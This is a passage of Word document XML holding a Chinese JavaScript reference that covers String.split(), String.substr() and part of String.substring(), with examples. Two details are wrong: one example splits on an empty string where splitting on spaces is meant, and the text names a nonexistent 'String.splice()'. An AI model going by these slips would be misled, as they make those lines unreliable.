      <w:bookmarkStart w:id="766" w:name="String_split__"/>
      <w:r>
        <w:t>String.split()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="766"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个字符串切分为一个由字符串组成的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string.split(delimiter,limit)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>delimiter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>切分处的字符串或正则表达式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>limit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个可选的整数指定已返回数组的最大长度。如果指定，则最多返回数量为这个数字的子串。如果没有指定，则将切分整个字符串，无论结果数组有多长。</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一个由字符串组成的数组，通过在由</w:t>
      </w:r>
      <w:r>
        <w:t>delimiter</w:t>
      </w:r>
      <w:r>
        <w:t>界定的边界处切分</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>为子串创建。返回数组中的子串不包含</w:t>
      </w:r>
      <w:r>
        <w:t>delimiter</w:t>
      </w:r>
      <w:r>
        <w:t>本身，除非是下面描述</w:t>
      </w:r>
      <w:r>
        <w:t>部分中提到的例外情况。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>split()</w:t>
      </w:r>
      <w:r>
        <w:t>方法创建并返回一个数组，内容为至多</w:t>
      </w:r>
      <w:r>
        <w:t>limit</w:t>
      </w:r>
      <w:r>
        <w:t>个给定的字符串</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>的子串。这些子串是这样创建的：从</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>的开头搜索到结尾，在所有匹配</w:t>
      </w:r>
      <w:r>
        <w:t>delimiter</w:t>
      </w:r>
      <w:r>
        <w:t>的文本的前方及后方断开。分割文本不包含在返回的子串中，除了在本节结尾处提到的例外。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，如果分隔符（</w:t>
      </w:r>
      <w:r>
        <w:t>delimiter</w:t>
      </w:r>
      <w:r>
        <w:t>）匹配给定字符串的开头内容，则返回数组的第一个元素将是空字符串</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>出现在分隔符之前的文本。类似地，如果分隔符匹配该字符串的末尾，则返回数组的最后一个元素（假设与</w:t>
      </w:r>
      <w:r>
        <w:t>limit</w:t>
      </w:r>
      <w:r>
        <w:t>不冲突）将是空字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果没有指定</w:t>
      </w:r>
      <w:r>
        <w:t>delimiter</w:t>
      </w:r>
      <w:r>
        <w:t>，则字符串</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>将不会切分，返回的数组将只包含一个未切分的字符串元素。如果</w:t>
      </w:r>
      <w:r>
        <w:t>delimiter</w:t>
      </w:r>
      <w:r>
        <w:t>为空字符串或是一个匹配空字符串的正则表达式，则字符串</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>将在每个字符之间断开，返回的数组将与</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>拥有一样的长度，当然，这是在假设没有指定更</w:t>
      </w:r>
      <w:r>
        <w:t>小的</w:t>
      </w:r>
      <w:r>
        <w:t>limit</w:t>
      </w:r>
      <w:r>
        <w:t>的情况下。（注意这是一个特例，因为第一个字符之前和最后一个字符之后的空字符不匹配。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>就像前面提到的，本方法返回的数组中的子串不包含用来切分该字符串的分隔文本。不过，如果</w:t>
      </w:r>
      <w:r>
        <w:t>delimiter</w:t>
      </w:r>
      <w:r>
        <w:t>是一个包含圆括号表达式的正则表达式，则匹配这些圆括号表达式的子串（但不是匹配整个正则表达式的文本）将包含在返回的数组中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意</w:t>
      </w:r>
      <w:r>
        <w:t>String.split()</w:t>
      </w:r>
      <w:r>
        <w:t>方法是</w:t>
      </w:r>
      <w:r>
        <w:t>Array.join()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的反方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>示例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在处理高度结构化的字符串时，</w:t>
      </w:r>
      <w:r>
        <w:t>split()</w:t>
      </w:r>
      <w:r>
        <w:t>方法非常有用。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"1:2:3:4:5".split("</w:t>
      </w:r>
      <w:r>
        <w:t>:");//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>["1","2","3","4","5"]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"|a|b|c|".split("|");//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>["","a","b","c",""]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>split()</w:t>
      </w:r>
      <w:r>
        <w:t>方法另一个常用的场景是解析命令或类似的字符串，方法是将它们在空白处断开为单词：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var words=sentence.split('');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用正则表达式作为分隔符将字符串切分为单词更容易：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var words=sentence.split(/\s+/);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>要将一个字符串切分为由字符组成的数组，可使用空字符串作为分隔符。如果只想将字符串的</w:t>
      </w:r>
      <w:r>
        <w:t>一个前缀切分为由字符组成的数组，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>limit</w:t>
      </w:r>
      <w:r>
        <w:t>参数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"hello".split("");//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>["h","e","l","l","o"]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"hello".split("",3);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>["h","e","l"]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果希望返回的数组中包含分隔符或分隔符的一个或多个部分，可以使用带圆括号子表达式的正则表达式。例如，下面的代码将一个字符串在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>标签处断开，同时在返回的数组中包含这些标签：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var text="hello</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>world</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/b</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>text.split(/(</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>[^</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>]*</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>)/)</w:t>
      </w:r>
      <w:r>
        <w:t>;//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>["hello","</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>","world","</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/b</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>",""]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Array.join()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>、第</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>章</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="767" w:name="String_substr__"/>
      <w:r>
        <w:t>String.substr()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="767"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>已弃用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>提取一个子串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string.substr(start,length)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>子串的开始位置。如果这个参数是负数，则将从</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>的尾部开始计算：</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>表示最后一个字符，</w:t>
      </w:r>
      <w:r>
        <w:t>-2</w:t>
      </w:r>
      <w:r>
        <w:t>表示倒数第二个字符，以此类推。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该子串中的字符数。如果省略这个参数，则返回的子串将包含从开始位置到字符串结束的所有字符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>的一部分的一个副本，包含</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中自</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>位置开始的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>个字符，如果未指定</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>则包含自</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>到结尾的所有字符。</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substr()</w:t>
      </w:r>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中提取并返回一个子串。它并不修改</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>本身。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，</w:t>
      </w:r>
      <w:r>
        <w:t>substr()</w:t>
      </w:r>
      <w:r>
        <w:t>通过一个开始字符的位置以及长度来指定期望取得的子串。这与</w:t>
      </w:r>
      <w:r>
        <w:t>String.substring()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>String.splice()</w:t>
      </w:r>
      <w:r>
        <w:t>不同并且有时会很有用，后两者是通过指定两个字符的位置来定义一个子串。不过需要注意，这个方法不再是</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>的标准，因此已弃用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>示例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var s="abcdefg";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.substr(2,2);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>"cd"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.substr(3);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>"defg"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s.substr(-3,2);//</w:t>
      </w:r>
      <w:r>
        <w:t>应该返回</w:t>
      </w:r>
      <w:r>
        <w:t>"ef";</w:t>
      </w:r>
      <w:r>
        <w:t>但在</w:t>
      </w:r>
      <w:r>
        <w:t>IE 4</w:t>
      </w:r>
      <w:r>
        <w:t>中返回</w:t>
      </w:r>
      <w:r>
        <w:t>"ab"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>bug</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:t>中传入负的</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>不会正常工作，它们不是从</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>的尾部开始计算字符位置，而是从位置</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>开始。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>String.slice()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.substring()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="768" w:name="String_substring__"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>String.substring()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="768"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回字符串的一个子串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string.substring(from,to)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>from</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个非负整数，指定要提取的子串的第一个字符在</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中的位置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个非负整数，比要提取的子串的最后一个字符的位置大</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
